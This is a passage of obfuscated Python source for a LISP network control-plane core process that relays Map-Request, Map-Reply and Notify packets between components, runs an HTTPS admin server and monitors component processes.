I1ii1II1iII = lisp . lisp_control_header ( )
if ( I1ii1II1iII . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return ( True )
if 19 - 19: I1ii11iIi11i / iIii1I11I1II1 % i1IIi . OoooooooOO
if ( I1ii1II1iII . type != lisp . LISP_MAP_REQUEST ) :
lisp . lprint ( "Received ECM without Map-Request inside" )
return ( True )
if 57 - 57: ooOoO0o . Oo0Ooo - OoO0O00 - i11iIiiIii * I1Ii111 / o0oOOo0O0Ooo
if 79 - 79: I1ii11iIi11i + o0oOOo0O0Ooo % Oo0Ooo * o0oOOo0O0Ooo
if 21 - 21: iII111i
if 24 - 24: iII111i / ooOoO0o
if 61 - 61: iIii1I11I1II1 + oO0o
i1IiiI = lisp . lisp_map_request ( )
packet = i1IiiI . decode ( packet , None , 0 )
O0OOO0 = i1IiiI . nonce
o0OIi = info_source . address . print_address_no_iid ( )
if 11 - 11: oO0o . I1IiiI + IiII / i1IIi
if 1 - 1: Oo0Ooo * I1Ii111 . OoooooooOO
if 73 - 73: OoOoOO00 % o0oOOo0O0Ooo
if 71 - 71: oO0o - OoooooooOO * Oo0Ooo * I11i + o0oOOo0O0Ooo * I1ii11iIi11i
i1IiiI . print_map_request ( )
if 85 - 85: i11iIiiIii . OoooooooOO - iIii1I11I1II1
lisp . lprint ( "Process {} from info-source {}, port {}, nonce 0x{}" . format ( lisp . bold ( "nat-proxy Map-Request" , False ) ,
# O0 % ooOoO0o % I11i
lisp . red ( o0OIi , False ) , info_source . port ,
lisp . lisp_hex_string ( O0OOO0 ) ) )
if 25 - 25: OoooooooOO % Ii1I * II111iiii - OoO0O00
if 95 - 95: I1IiiI % I1Ii111 * I1IiiI + O0 . I1Ii111 % OoooooooOO
if 6 - 6: OoOoOO00 - ooOoO0o * o0oOOo0O0Ooo + OoOoOO00 % o0oOOo0O0Ooo
if 100 - 100: OoO0O00 % I1Ii111 - I11i % I11i % I11i / ooOoO0o
if 83 - 83: oO0o - ooOoO0o - IiII % i1IIi - iII111i . o0oOOo0O0Ooo
info_source . cache_nonce_for_info_source ( O0OOO0 )
if 96 - 96: Oo0Ooo + I1Ii111 . i1IIi
if 54 - 54: II111iiii . i1IIi / I1ii11iIi11i % I1IiiI / I1Ii111
if 65 - 65: OoOoOO00 . OoOoOO00 - oO0o + Oo0Ooo / i11iIiiIii
if 90 - 90: iIii1I11I1II1 + OoOoOO00
if 9 - 9: iIii1I11I1II1 . OoooooooOO + i1IIi - Oo0Ooo
info_source . no_timeout = i1IiiI . subscribe_bit
if 30 - 30: iII111i / OoO0O00 . iII111i
if 17 - 17: Oo0Ooo + OoooooooOO * OoooooooOO
if 5 - 5: I1Ii111 % OoooooooOO . OoOoOO00
if 67 - 67: I1ii11iIi11i + Ii1I
if 72 - 72: IiII % o0oOOo0O0Ooo
if 93 - 93: iIii1I11I1II1 + i11iIiiIii . o0oOOo0O0Ooo . i1IIi % I1IiiI % ooOoO0o
for oO0oo in i1IiiI . itr_rlocs :
if ( oO0oo . is_local ( ) ) : return ( False )
if 52 - 52: IiII % ooOoO0o
if 25 - 25: I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
if 23 - 23: i11iIiiIii
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
if 65 - 65: II111iiii / Oo0Ooo
iiII1i = lisp . lisp_myrlocs [ 0 ]
i1IiiI . itr_rloc_count = 0
i1IiiI . itr_rlocs = [ ]
i1IiiI . itr_rlocs . append ( iiII1i )
if 19 - 19: I1IiiI + i11iIiiIii . IiII - I11i / Ii1I + o0oOOo0O0Ooo
packet = i1IiiI . encode ( None , 0 )
i1IiiI . print_map_request ( )
if 38 - 38: Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1 % I1ii11iIi11i
O00o = i1IiiI . target_eid
if ( O00o . is_ipv6 ( ) ) :
o0o0ooOo00 = lisp . lisp_myrlocs [ 1 ]
if ( o0o0ooOo00 != None ) : iiII1i = o0o0ooOo00
if 91 - 91: OoO0O00 * I1Ii111 % OoO0O00 . o0oOOo0O0Ooo * I1ii11iIi11i . OOooOOo
if 13 - 13: I1ii11iIi11i
if 80 - 80: Oo0Ooo % IiII % OoooooooOO * Oo0Ooo % Ii1I
if 41 - 41: OoooooooOO / i1IIi
if 70 - 70: OoOoOO00 % o0oOOo0O0Ooo % i1IIi / I1ii11iIi11i % i11iIiiIii / i1IIi
i1i1Ii1IiIII = lisp . lisp_is_running ( "lisp-ms" )
lisp . lisp_send_ecm ( lisp_sockets , packet , O00o , lisp . LISP_CTRL_PORT ,
O00o , iiII1i , to_ms = i1i1Ii1IiIII , ddt = False )
return ( True )
if 9 - 9: I11i - oO0o + O0 / iII111i % i1IIi
if 97 - 97: o0oOOo0O0Ooo * ooOoO0o
if 78 - 78: I11i . OOooOOo + oO0o * iII111i - i1IIi
if 27 - 27: Ii1I % i1IIi . Oo0Ooo % I1Ii111
if 10 - 10: IiII / OoooooooOO
if 50 - 50: i11iIiiIii - OoooooooOO . oO0o + O0 . i1IIi
if 91 - 91: o0oOOo0O0Ooo . iII111i % Oo0Ooo - iII111i . oO0o % i11iIiiIii
if 25 - 25: iIii1I11I1II1
if 63 - 63: ooOoO0o
def oO0oOOOooo ( lisp_sockets , info_source , packet , mr_or_mn ) :
o0OIi = info_source . address . print_address_no_iid ( )
oOoO0o00OO0 = info_source . port
O0OOO0 = info_source . nonce
if 6 - 6: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo / iIii1I11I1II1 * I1Ii111
mr_or_mn = "Reply" if mr_or_mn else "Notify"
mr_or_mn = lisp . bold ( "nat-proxy Map-{}" . format ( mr_or_mn ) , False )
if 3 - 3: OOooOOo . IiII / Oo0Ooo
lisp . lprint ( "Forward {} to info-source {}, port {}, nonce 0x{}" . format ( mr_or_mn , lisp . red ( o0OIi , False ) , oOoO0o00OO0 ,
# iIii1I11I1II1 % iIii1I11I1II1 / ooOoO0o . oO0o + I1Ii111 . I1Ii111
lisp . lisp_hex_string ( O0OOO0 ) ) )
if 90 - 90: o0oOOo0O0Ooo / OOooOOo - OOooOOo . I1IiiI
if 82 - 82: I1Ii111 . I1Ii111 - iII111i
if 72 - 72: i11iIiiIii
if 94 - 94: OOooOOo
i1IiI1ii1i = lisp . lisp_convert_4to6 ( o0OIi )
lisp . lisp_send ( lisp_sockets , i1IiI1ii1i , oOoO0o00OO0 , packet )
if 39 - 39: OOooOOo + OoO0O00
if 80 - 80: OOooOOo % OoO0O00 / OoOoOO00
if 54 - 54: Oo0Ooo % OoO0O00 - OOooOOo - I11i
if 71 - 71: ooOoO0o . i11iIiiIii
if 56 - 56: O0 * iII111i + iII111i * iIii1I11I1II1 / ooOoO0o * I1Ii111
if 25 - 25: iIii1I11I1II1 . I11i * i11iIiiIii + Oo0Ooo * I11i
if 67 - 67: iII111i
def oooO0o ( lisp_sockets , source , sport , packet ) :
global Oo
if 19 - 19: OOooOOo % OoO0O00 / Ii1I + II111iiii % OoooooooOO
I1ii1II1iII = lisp . lisp_control_header ( )
if ( I1ii1II1iII . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return
if 89 - 89: Ii1I
if 51 - 51: iII111i
if 68 - 68: iII111i - o0oOOo0O0Ooo * OoO0O00 % ooOoO0o . ooOoO0o - iIii1I11I1II1
if 22 - 22: OoooooooOO / I1ii11iIi11i % iII111i * OoOoOO00
if 32 - 32: OoooooooOO % oO0o % iIii1I11I1II1 / O0
if 61 - 61: II111iiii . O0 - Ii1I - I1ii11iIi11i / i11iIiiIii - II111iiii
if 98 - 98: Ii1I - I1IiiI . i11iIiiIii * Oo0Ooo
if 29 - 29: Ii1I / ooOoO0o % I11i
if 10 - 10: iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
if ( I1ii1II1iII . type == lisp . LISP_NAT_INFO ) :
if ( I1ii1II1iII . info_reply == False ) :
lisp . lisp_process_info_request ( lisp_sockets , packet , source , sport ,
lisp . lisp_ms_rtr_list )
if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
return
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
oo0O00ooo0o = packet
packet = lisp . lisp_packet_ipc ( packet , source , sport )
if 29 - 29: OoooooooOO . II111iiii % OoOoOO00
if 26 - 26: iIii1I11I1II1 - I1ii11iIi11i . IiII . IiII + iIii1I11I1II1 * Oo0Ooo
if 85 - 85: OOooOOo + II111iiii - OOooOOo * oO0o - i1IIi % iII111i
if 1 - 1: OoooooooOO / O0 + OoOoOO00 + OoOoOO00 . I1Ii111 - OoOoOO00
if ( I1ii1II1iII . type in ( lisp . LISP_MAP_REGISTER , lisp . LISP_MAP_NOTIFY_ACK ) ) :
lisp . lisp_ipc ( packet , Oo , "lisp-ms" )
return
if 9 - 9: I1Ii111 * OoooooooOO % I1IiiI / OoOoOO00 * I11i
if 48 - 48: OoooooooOO . OoOoOO00
if 65 - 65: oO0o . Oo0Ooo
if 94 - 94: OoOoOO00 + IiII . ooOoO0o
if 69 - 69: O0 - O0
if ( I1ii1II1iII . type == lisp . LISP_MAP_REPLY ) :
i1I1i1i1I1 = lisp . lisp_map_reply ( )
i1I1i1i1I1 . decode ( oo0O00ooo0o )
if 17 - 17: OoOoOO00 + OoooooooOO % OOooOOo
OoooOO0Oo0 = iiIIIIiI111 ( None , 0 , i1I1i1i1I1 . nonce )
if ( OoooOO0Oo0 ) :
oO0oOOOooo ( lisp_sockets , OoooOO0Oo0 , oo0O00ooo0o , True )
else :
O0OoO0o = "/tmp/lisp-lig"
if ( os . path . exists ( O0OoO0o ) ) :
lisp . lisp_ipc ( packet , Oo , O0OoO0o )
else :
lisp . lisp_ipc ( packet , Oo , "lisp-itr" )
if 36 - 36: i11iIiiIii + I1ii11iIi11i % OOooOOo . I1IiiI - ooOoO0o
if 94 - 94: I1IiiI % OoOoOO00 . IiII . ooOoO0o . OoO0O00
return
if 53 - 53: OoOoOO00
if 84 - 84: OoO0O00
if 97 - 97: i1IIi
if 98 - 98: OoooooooOO - I1IiiI + ooOoO0o
if 98 - 98: iII111i . IiII . IiII - OOooOOo
if ( I1ii1II1iII . type == lisp . LISP_MAP_NOTIFY ) :
oOOO0o = lisp . lisp_map_notify ( lisp_sockets )
oOOO0o . decode ( oo0O00ooo0o )
if 18 - 18: I1ii11iIi11i / Oo0Ooo - iII111i
OoooOO0Oo0 = iiIIIIiI111 ( None , 0 , oOOO0o . nonce )
if ( OoooOO0Oo0 ) :
oO0oOOOooo ( lisp_sockets , OoooOO0Oo0 , oo0O00ooo0o ,
False )
else :
O0OoO0o = "/tmp/lisp-lig"
if ( os . path . exists ( O0OoO0o ) ) :
lisp . lisp_ipc ( packet , Oo , O0OoO0o )
else :
OOoO00ooO = "lisp-rtr" if lisp . lisp_is_running ( "lisp-rtr" ) else "lisp-etr"
if 69 - 69: oO0o / IiII * ooOoO0o
lisp . lisp_ipc ( packet , Oo , OOoO00ooO )
if 81 - 81: oO0o
if 62 - 62: Ii1I + O0 * OoO0O00
return
if 59 - 59: II111iiii
if 43 - 43: Oo0Ooo + OoooooooOO
if 47 - 47: ooOoO0o
if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
if 23 - 23: II111iiii * iII111i
if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
if ( I1ii1II1iII . type == lisp . LISP_MAP_REFERRAL ) :
II1io0 = "/tmp/lisp-rig"
if ( os . path . exists ( II1io0 ) ) :
lisp . lisp_ipc ( packet , Oo , II1io0 )
else :
lisp . lisp_ipc ( packet , Oo , "lisp-mr" )
if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
return
if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
if 21 - 21: OoO0O00
if 63 - 63: I11i . O0 * I11i + iIii1I11I1II1
if 46 - 46: i1IIi + II111iiii * i1IIi - Ii1I
if 79 - 79: II111iiii - oO0o * I1ii11iIi11i - OoOoOO00 . I1ii11iIi11i
if ( I1ii1II1iII . type == lisp . LISP_MAP_REQUEST ) :
OOoO00ooO = "lisp-itr" if ( I1ii1II1iII . is_smr ( ) ) else "lisp-etr"
if 11 - 11: O0 * OoOoOO00
if 37 - 37: OoOoOO00 + O0 . O0 * Oo0Ooo % I1Ii111 / iII111i
if 18 - 18: OoooooooOO
if 57 - 57: ooOoO0o . OoOoOO00 * o0oOOo0O0Ooo - OoooooooOO
if 75 - 75: i11iIiiIii / o0oOOo0O0Ooo . IiII . i1IIi . i1IIi / I11i
if ( I1ii1II1iII . rloc_probe ) : return
if 94 - 94: ooOoO0o + I1IiiI
lisp . lisp_ipc ( packet , Oo , OOoO00ooO )
return
if 56 - 56: OoOoOO00 % o0oOOo0O0Ooo
if 40 - 40: OOooOOo / IiII
if 29 - 29: Ii1I - Ii1I / ooOoO0o
if 49 - 49: I11i + oO0o % OoO0O00 - Oo0Ooo - O0 - OoooooooOO
if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
if 18 - 18: Oo0Ooo % O0
if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
if ( I1ii1II1iII . type == lisp . LISP_ECM ) :
OoooOO0Oo0 = iiIIIIiI111 ( source , sport , None )
if ( OoooOO0Oo0 ) :
if ( oo0oO00o0O00o ( lisp_sockets , OoooOO0Oo0 ,
oo0O00ooo0o ) ) : return
if 86 - 86: IiII
if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
OOoO00ooO = "lisp-mr"
if ( I1ii1II1iII . is_to_etr ( ) ) :
OOoO00ooO = "lisp-etr"
elif ( I1ii1II1iII . is_to_ms ( ) ) :
OOoO00ooO = "lisp-ms"
elif ( I1ii1II1iII . is_ddt ( ) ) :
if ( lisp . lisp_is_running ( "lisp-ddt" ) ) :
OOoO00ooO = "lisp-ddt"
elif ( lisp . lisp_is_running ( "lisp-ms" ) ) :
OOoO00ooO = "lisp-ms"
if 33 - 33: II111iiii - IiII - ooOoO0o
elif ( lisp . lisp_is_running ( "lisp-mr" ) == False ) :
OOoO00ooO = "lisp-etr"
if 92 - 92: OoO0O00 * IiII
lisp . lisp_ipc ( packet , Oo , OOoO00ooO )
if 92 - 92: oO0o
return
if 7 - 7: iII111i
if 73 - 73: OoO0O00 % I1ii11iIi11i
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
if 62 - 62: i11iIiiIii
if 2 - 2: I1IiiI
if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
if 14 - 14: IiII . IiII % ooOoO0o
if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
if 32 - 32: o0oOOo0O0Ooo . i1IIi * Oo0Ooo
class O0oooo0O ( bottle . ServerAdapter ) :
def run ( self , hand ) :
Ii1iiIIi1i = "./lisp-cert.pem"
if 44 - 44: o0oOOo0O0Ooo
if 51 - 51: II111iiii
if 10 - 10: OoO0O00 % OoO0O00 / o0oOOo0O0Ooo - OoOoOO00
if 44 - 44: ooOoO0o - O0 / II111iiii . iIii1I11I1II1 . i1IIi
if 63 - 63: iIii1I11I1II1 + IiII % i1IIi / I1IiiI % II111iiii
if ( os . path . exists ( Ii1iiIIi1i ) == False ) :
os . system ( "cp ./lisp-cert.pem.default {}" . format ( Ii1iiIIi1i ) )
lisp . lprint ( ( "{} does not exist, creating a copy from lisp-" + "cert.pem.default" ) . format ( Ii1iiIIi1i ) )
if 60 - 60: o0oOOo0O0Ooo . OoOoOO00 % I1Ii111 / I1IiiI / O0
if 19 - 19: i11iIiiIii . I1IiiI + II111iiii / OOooOOo . I1ii11iIi11i * ooOoO0o
if 59 - 59: iIii1I11I1II1 / I1ii11iIi11i % ooOoO0o
Oooo = wsgiserver . CherryPyWSGIServer ( ( self . host , self . port ) , hand )
Oooo . ssl_adapter = pyOpenSSLAdapter ( Ii1iiIIi1i , Ii1iiIIi1i , None )
if 74 - 74: ooOoO0o % OoOoOO00 / Oo0Ooo
if 2 - 2: IiII % IiII % I1Ii111
try :
Oooo . start ( )
finally :
Oooo . stop ( )
if 60 - 60: OOooOOo
if 73 - 73: ooOoO0o
if 86 - 86: OoOoOO00 . I11i / Oo0Ooo * I11i
if 20 - 20: ooOoO0o - OOooOOo * OoO0O00 * o0oOOo0O0Ooo * OOooOOo / IiII
if 40 - 40: I1IiiI * o0oOOo0O0Ooo . I1IiiI
if 62 - 62: ooOoO0o + II111iiii % ooOoO0o
if 50 - 50: OoooooooOO + oO0o * I1IiiI - Ii1I / i11iIiiIii
if 5 - 5: O0 - I1IiiI
if 44 - 44: II111iiii . II111iiii + OOooOOo * Ii1I
if 16 - 16: II111iiii
if 100 - 100: O0 - i1IIi
if 48 - 48: oO0o % ooOoO0o + O0
if 27 - 27: I1ii11iIi11i / OOooOOo
if 33 - 33: OoooooooOO % I1ii11iIi11i . O0 / I1ii11iIi11i
if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
if 72 - 72: OoO0O00 + i11iIiiIii + I1ii11iIi11i
def oOooOoOOo0O ( bottle_port ) :
lisp . lisp_set_exception ( )
if 41 - 41: iII111i
if 88 - 88: O0 . oO0o % I1IiiI
if 10 - 10: I1IiiI + O0
if 75 - 75: O0 % iIii1I11I1II1 / OoOoOO00 % OOooOOo / IiII
if 31 - 31: i11iIiiIii * OoOoOO00
if ( bottle_port < 0 ) :
bottle . run ( host = "0.0.0.0" , port = - bottle_port )
return
if 69 - 69: i11iIiiIii
if 61 - 61: O0
bottle . server_names [ "lisp-ssl-server" ] = O0oooo0O
if 21 - 21: OoO0O00 % iIii1I11I1II1 . OoO0O00
if 99 - 99: o0oOOo0O0Ooo * OOooOOo % oO0o * oO0o + OoooooooOO
if 82 - 82: I11i / OoOoOO00 - OOooOOo / ooOoO0o
if 50 - 50: OOooOOo + OoO0O00 . i11iIiiIii + I1ii11iIi11i + i11iIiiIii
try :
bottle . run ( host = "0.0.0.0" , port = bottle_port , server = "lisp-ssl-server" ,
fast = True )
except :
bottle . run ( host = "0.0.0.0" , port = bottle_port , fast = True )
if 31 - 31: oO0o * I1Ii111 . OoOoOO00 * I11i
return
if 28 - 28: IiII + I1IiiI - Oo0Ooo % OOooOOo . I11i + I1IiiI
if 72 - 72: Ii1I / Oo0Ooo / oO0o * OoOoOO00 + OOooOOo
if 58 - 58: o0oOOo0O0Ooo % I1IiiI . I1IiiI * OoO0O00 - IiII . OoooooooOO
if 10 - 10: I1Ii111
if 48 - 48: iII111i * i1IIi % OoooooooOO * Ii1I * OoO0O00
if 7 - 7: iII111i . Ii1I . iII111i - I1Ii111
if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
def o00OIIIIIiiI ( ) :
lisp . lisp_set_exception ( )
if 38 - 38: O0
return
if 79 - 79: i1IIi . oO0o
if 34 - 34: I1Ii111 * II111iiii
if 71 - 71: IiII
if 97 - 97: I1ii11iIi11i
if 86 - 86: Oo0Ooo - OOooOOo . OoOoOO00 . II111iiii * I1IiiI . II111iiii
if 34 - 34: o0oOOo0O0Ooo . I1Ii111 % IiII - O0 / I1Ii111
if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
if 28 - 28: i11iIiiIii
if 51 - 51: I1IiiI + ooOoO0o * O0 . Ii1I
def O00Oo00OOoO0 ( lisp_socket ) :
lisp . lisp_set_exception ( )
IIiiI = { "lisp-itr" : False , "lisp-etr" : False , "lisp-rtr" : False ,
"lisp-mr" : False , "lisp-ms" : False , "lisp-ddt" : False }
if 99 - 99: OoO0O00 / i1IIi . I1ii11iIi11i
while ( True ) :
time . sleep ( 1 )
I1I1i11iiiiI = IIiiI
IIiiI = { }
if 66 - 66: oO0o / OoOoOO00
for OOoO00ooO in I1I1i11iiiiI :
IIiiI [ OOoO00ooO ] = lisp . lisp_is_running ( OOoO00ooO )
if ( I1I1i11iiiiI [ OOoO00ooO ] == IIiiI [ OOoO00ooO ] ) : continue
if 13 - 13: II111iiii
lisp . lprint ( "*** Process '{}' has {} ***" . format ( OOoO00ooO ,
"come up" if IIiiI [ OOoO00ooO ] else "gone down" ) )
if 55 - 55: Oo0Ooo % i1IIi * I11i
if 95 - 95: OOooOOo / II111iiii - o0oOOo0O0Ooo % I1Ii111 . I11i
if 63 - 63: iIii1I11I1II1 / ooOoO0o
if 24 - 24: Oo0Ooo / iIii1I11I1II1 % OOooOOo * OoOoOO00 - iIii1I11I1II1
if ( IIiiI [ OOoO00ooO ] == True ) :
lisp . lisp_ipc_lock . acquire ( )
lispconfig . lisp_send_commands ( lisp_socket , OOoO00ooO )
lisp . lisp_ipc_lock . release ( )
if 50 - 50: II111iiii
if 39 - 39: II111iiii . OoOoOO00 - Oo0Ooo * i1IIi . OoooooooOO
if 44 - 44: I1IiiI
return
if 55 - 55: oO0o . I1Ii111 * I1Ii111
if 82 - 82: I1IiiI % OoO0O00 % I11i + I11i
if 6 - 6: Oo0Ooo
if 73 - 73: I1Ii111 * I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo . I11i
if 93 - 93: i11iIiiIii
if 80 - 80: i1IIi . I1IiiI - oO0o + OOooOOo + iII111i % oO0o
if 13 - 13: II111iiii / OoOoOO00 / OoOoOO00 + ooOoO0o
def Ii1i ( ) :
lisp . lisp_set_exception ( )
ooooOoOooo00Oo = 60
if 72 - 72: I11i
while ( True ) :
time . sleep ( ooooOoOooo00Oo )
if 26 - 26: IiII % Oo0Ooo
OoOOoo = [ ]
II1ii1 = lisp . lisp_get_timestamp ( )
if 34 - 34: OoOoOO00 - oO0o * OoooooooOO
if 5 - 5: i11iIiiIii * iII111i - Ii1I - I1ii11iIi11i - i1IIi + iII111i
if 4 - 4: ooOoO0o + O0 . i1IIi * I1ii11iIi11i - o0oOOo0O0Ooo
if 42 - 42: o0oOOo0O0Ooo * OoOoOO00 . OoO0O00 - iII111i / II111iiii
for iii1I1Iii in lisp . lisp_info_sources_by_address :
OoooOO0Oo0 = lisp . lisp_info_sources_by_address [ iii1I1Iii ]
if ( OoooOO0Oo0 . no_timeout ) : continue
if ( OoooOO0Oo0 . uptime + ooooOoOooo00Oo < II1ii1 ) : continue
if 25 - 25: Oo0Ooo % OoOoOO00
OoOOoo . append ( iii1I1Iii )
if 75 - 75: i1IIi
O0OOO0 = OoooOO0Oo0 . nonce
if ( O0OOO0 == None ) : continue
if ( O0OOO0 in lisp . lisp_info_sources_by_nonce ) :
lisp . lisp_info_sources_by_nonce . pop ( O0OOO0 )
if 74 - 74: Oo0Ooo + I1Ii111 - oO0o - OoO0O00 + iII111i - iIii1I11I1II1
if 54 - 54: I1ii11iIi11i + II111iiii . I1IiiI / OoO0O00 . ooOoO0o
if 58 - 58: IiII % i11iIiiIii * II111iiii . I1ii11iIi11i
if 94 - 94: i11iIiiIii . OOooOOo + iIii1I11I1II1 * I1Ii111 * I1Ii111
if 36 - 36: I11i - IiII . IiII
if 60 - 60: i11iIiiIii * Oo0Ooo % OoO0O00 + OoO0O00
for iii1I1Iii in OoOOoo :
lisp . lisp_info_sources_by_address . pop ( iii1I1Iii )
if 84 - 84: iIii1I11I1II1 + OoooooooOO
if 77 - 77: O0 * I1ii11iIi11i * oO0o + OoO0O00 + I1ii11iIi11i - I1Ii111
return
if 10 - 10: I1ii11iIi11i + IiII
if 58 - 58: I1IiiI + OoooooooOO / iII111i . ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i
if 62 - 62: II111iiii
if 12 - 12: IiII + II111iiii
if 92 - 92: I1Ii111 % iIii1I11I1II1 - iII111i / i11iIiiIii % ooOoO0o * o0oOOo0O0Ooo
if 80 - 80: iII111i
if 3 - 3: I1ii11iIi11i * I11i
if 53 - 53: iIii1I11I1II1 / iII111i % OoO0O00 + IiII / ooOoO0o
def oo00oO ( lisp_ipc_control_socket , lisp_sockets ) :
lisp . lisp_set_exception ( )
while ( True ) :
try : I11i1I11 = lisp_ipc_control_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
IIIi1i1I = I11i1I11 [ 0 ] . split ( "@" )
ooo0O = I11i1I11 [ 1 ]
if 32 - 32: IiII - oO0o . iIii1I11I1II1 . I1Ii111 + II111iiii % OoooooooOO
iIii = IIIi1i1I [ 0 ]
i1IiI1ii1i = IIIi1i1I [ 1 ]
oOoO0o00OO0 = int ( IIIi1i1I [ 2 ] )
Oo000 = IIIi1i1I [ 3 : : ]
if 75 - 75: O0
if ( len ( Oo000 ) > 1 ) :
Oo000 = lisp . lisp_bit_stuff ( Oo000 )
else :
Oo000 = Oo000 [ 0 ]
if 56 - 56: OoO0O00 / II111iiii
if 39 - 39: OoOoOO00 - OoooooooOO - i1IIi / II111iiii
if ( iIii != "control-packet" ) :
lisp . lprint ( ( "lisp_core_control_packet_process() received" + "unexpected control-packet, message ignored" ) )
if 49 - 49: Oo0Ooo + O0 + IiII . II111iiii % ooOoO0o
continue
if 33 - 33: OoOoOO00 . iIii1I11I1II1 / I11i % Ii1I
if 49 - 49: OoO0O00 + II111iiii / IiII - O0 % Ii1I
lisp . lprint ( ( "{} {} bytes from {}, dest/port: {}/{}, control-" + "packet: {}" ) . format ( lisp . bold ( "Receive" , False ) , len ( Oo000 ) ,
# Oo0Ooo / OoO0O00
ooo0O , i1IiI1ii1i , oOoO0o00OO0 , lisp . lisp_format_packet ( Oo000 ) ) )
if 40 - 40: I11i / iII111i + OoO0O00 / OoooooooOO - oO0o / I1Ii111
if 62 - 62: i11iIiiIii - I11i
if 81 - 81: I11i
if 92 - 92: OOooOOo - Oo0Ooo - OoooooooOO / IiII - i1IIi
if 81 - 81: i1IIi / I1Ii111 % i11iIiiIii . iIii1I11I1II1 * OoOoOO00 + OoooooooOO
if 31 - 31: i1IIi % II111iiii
I1ii1II1iII = lisp . lisp_control_header ( )
I1ii1II1iII . decode ( Oo000 )
if ( I1ii1II1iII . type == lisp . LISP_MAP_REPLY ) :
i1I1i1i1I1 = lisp . lisp_map_reply ( )
i1I1i1i1I1 . decode ( Oo000 )
if ( iiIIIIiI111 ( None , 0 , i1I1i1i1I1 . nonce ) ) :
oooO0o ( lisp_sockets , ooo0O , oOoO0o00OO0 , Oo000 )
continue
if 13 - 13: iIii1I11I1II1 - II111iiii % O0 . Ii1I % OoO0O00
if 2 - 2: OoooooooOO - Ii1I % oO0o / I1IiiI / o0oOOo0O0Ooo
if 3 - 3: II111iiii / OOooOOo
if 48 - 48: ooOoO0o . I1ii11iIi11i
if 49 - 49: i1IIi - OoOoOO00 . Oo0Ooo + iIii1I11I1II1 - ooOoO0o / Oo0Ooo
if 24 - 24: oO0o - iII111i / ooOoO0o
if 10 - 10: OoOoOO00 * i1IIi
if 15 - 15: I11i + i1IIi - II111iiii % I1IiiI
if ( I1ii1II1iII . type == lisp . LISP_MAP_NOTIFY and ooo0O == "lisp-etr" ) :
Oo0O00Oo0o0 = lisp . lisp_packet_ipc ( Oo000 , ooo0O , oOoO0o00OO0 )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-itr" )
continue
if 34 - 34: I1IiiI
if 57 - 57: OOooOOo . Ii1I % o0oOOo0O0Ooo
if 32 - 32: I11i / IiII - O0 * iIii1I11I1II1
if 70 - 70: OoooooooOO % OoooooooOO % OoO0O00
if 98 - 98: OoO0O00
if 18 - 18: I11i + Oo0Ooo - OoO0O00 / I1Ii111 / OOooOOo
if 53 - 53: OOooOOo + o0oOOo0O0Ooo . oO0o / I11i
OoooOo0 = lisp . lisp_convert_4to6 ( i1IiI1ii1i )
OoooOo0 = lisp . lisp_address ( lisp . LISP_AFI_IPV6 , "" , 128 , 0 )
if ( OoooOo0 . is_ipv4_string ( i1IiI1ii1i ) ) : i1IiI1ii1i = "::ffff:" + i1IiI1ii1i
OoooOo0 . store_address ( i1IiI1ii1i )
if 52 - 52: I1Ii111 + I1Ii111
if 73 - 73: o0oOOo0O0Ooo . i11iIiiIii % OoooooooOO + ooOoO0o . OoooooooOO / OOooOOo
if 54 - 54: OoOoOO00 . OoooooooOO
if 36 - 36: oO0o / II111iiii * IiII % I1ii11iIi11i
lisp . lisp_send ( lisp_sockets , OoooOo0 , oOoO0o00OO0 , Oo000 )
if 31 - 31: II111iiii + OOooOOo - OoooooooOO . I11i
return
if 28 - 28: Ii1I . I1ii11iIi11i
if 77 - 77: I1ii11iIi11i % II111iiii
if 81 - 81: OoOoOO00 % Ii1I / O0 * iIii1I11I1II1 % IiII . I1IiiI
if 90 - 90: o0oOOo0O0Ooo
if 44 - 44: o0oOOo0O0Ooo / I1ii11iIi11i . Oo0Ooo + OoOoOO00
if 32 - 32: IiII - ooOoO0o * iII111i * I11i
if 84 - 84: Ii1I + I1ii11iIi11i % I1IiiI + i11iIiiIii
if 37 - 37: I11i % I1ii11iIi11i / ooOoO0o
def iI11I ( ) :
Oo0O0oooo = open ( "./lisp.config.example" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
Oo0O0oooo = open ( "./lisp.config" , "w" )
